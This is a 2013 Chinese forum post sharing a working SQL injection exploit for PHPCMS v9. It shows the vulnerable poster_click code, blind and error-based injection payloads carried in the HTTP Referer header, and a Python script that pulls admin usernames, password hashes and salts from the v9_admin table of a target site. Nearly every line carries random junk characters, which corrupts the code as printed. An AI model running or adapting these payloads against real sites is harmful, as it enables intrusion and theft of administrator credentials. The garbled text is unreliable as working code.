有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
0 z: R7 o# t! _( m( _8 d( \" u' u4 k+ G
问题函数\phpcms\modules\poster\index.php
( w- g9 y7 z6 p7 k
7 `& i' N% f4 ~4 ipublic function poster_click() {
4 R! G k: K) n( j$ d% }* \2 `$id = isset($_GET['id']) ? intval($_GET['id']) : 0;0 U) _+ [% E, n: b! A7 x6 |
$r = $this->db->get_one(array('id'=>$id));! E, b& y5 k. G. ]* z
if (!is_array($r) && empty($r)) return false;
# N' n6 a+ {7 O# Q$ip_area = pc_base::load_sys_class('ip_area');
5 n7 M1 v1 L. Y- i; |6 v6 t; [$ip = ip();; x- d; o/ m4 f# z0 @6 [
$area = $ip_area->get($ip);
. a) e' X" N. b8 o2 M( _$username = param::get_cookie('username') ? param::get_cookie('username') : '';
, l& O5 X3 T2 ]- X/ B/ F! ^if($id) {
, }5 \9 R* P: i6 J" \$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();1 U$ _ z* P5 v; T; f6 b
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
) x1 s9 e# P* b* }}
( Z% i" g( S, T; |; f" T$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));: [! q/ ]) y/ @7 }* d7 Z- Y
$setting = string2array($r['setting']);% H/ z. [9 b1 z( L3 I
if (count($setting)==1) {* [# m% c( c' d0 E' o
$url = $setting['1']['linkurl'];
; {% b& N3 C7 l! G2 @/ ^8 B' ^} else {
9 Y8 `6 f5 h" R" d( h& o' a5 P$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];6 E+ M3 ~8 n% y% t' u1 X" J, [9 J0 y q
}0 r2 y& e8 G" d6 K5 i8 j% {3 H8 Q
header('Location: '.$url); A5 G0 Q+ |! T! [1 z
}
1 @" ~3 h/ T4 _
& X0 u# A; k3 H7 j( K 8 g9 I2 ~, B# I# V) _
1 W! ~$ W3 X; J1 B6 r利用方式:
4 W6 a- U l, @! f
2 a: H/ T8 N# L1 `- |% S; G1、可以采用盲注入的手法:
?2 Y9 \8 L8 i: h, s
2 o% j t' V* }1 ?# `referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)# K$ p0 x b. t* ?
: G/ b6 s7 _. @通过返回页面,正常与否一个个猜解密码字段。. Q. o; s! C$ f, j: R
- U4 s! D$ C4 ^. u2、代码是花开写的,随手附上了:; d5 s/ U( R5 Z7 h9 D9 H, X3 j
; p* N: T7 s1 {* Y1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#) m" K" b) t% K: s1 _* T4 `
( t! {8 V/ V! d, S% x6 u4 s此方法是爆错注入手法,原理自查。; V8 S5 }1 q; Y% r" L
/ f+ Y% ~ c4 d! {# n7 N' A
7 U9 V3 r: ]! g& g" {6 f+ E/ B' g) E8 I# u. o/ l0 p
利用程序:# f$ \; p, {" B3 I' C9 L) T
! o) S6 x5 h8 N) r6 k$ j. P
#!/usr/bin/env python
# o5 O# [ ?3 j3 W5 |# gimport httplib,sys,re
% q( m$ P: v/ @9 P9 n
" ?6 n. g' n/ |9 X- R* ?7 Fdef attack():
% W: M9 g7 c4 m$ p; N \6 k" j: uprint “Code by Pax.Mac Team conqu3r!”
6 p: F+ Z( `" K4 y! e% ~print “Welcome to our zone!!!”+ w, C8 s0 p3 t6 |# t8 H+ s4 P: ?: R
url=sys.argv[1]3 @+ H- N/ U+ W
paths=sys.argv[2]
7 X, B" E! b; R7 |' b; rconn = httplib.HTTPConnection(url)
0 f4 Q; q7 F4 H- d/ F1 o8 f, L7 [i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
3 _4 E# ~) b& D/ g2 G2 _7 p“Accept”: “text/plain”,# C3 r2 Y$ k4 F @4 N! H
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}% a' r/ F* Z- R3 g: p! L
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)# }' P2 c3 ]& T
r1 = conn.getresponse()7 ?' c+ u Y7 e. m8 h: K
datas=r1.read()
* i/ f6 Q3 p9 u* M- J2 B0 P: fdatas=re.findall(r”Duplicate entry \’\w+’”, datas)
! D- P _- F* h* v1 Xprint datas[0]
- |! {" ?8 l* N7 D _- xconn.close()7 q7 V/ M4 D( S2 B6 `- x5 i
if __name__==”__main__”:
s' x2 _" q4 N, C( Yif len(sys.argv)<3: N9 V/ s3 U+ N# {
print “Code by Pax.Mac Team conqu3r”
1 A2 ^" J8 \! Nprint “Usgae:”8 h4 e4 L1 O( H& v; u7 M
print “ phpcmsattack.py www.paxmac.org /”
0 k, x6 `0 M* l% [( bprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
, `% r% ^( U4 l3 K4 b8 j' a2 U' gsys.exit(1)
+ b0 h. z/ U( A/ t8 ?+ m; ]attack()( v# D5 d9 T" [+ o+ X2 m6 L
6 M5 {0 F. q# N# \ |
发表于 2013-1-11 21:01:00
收藏
支持
反对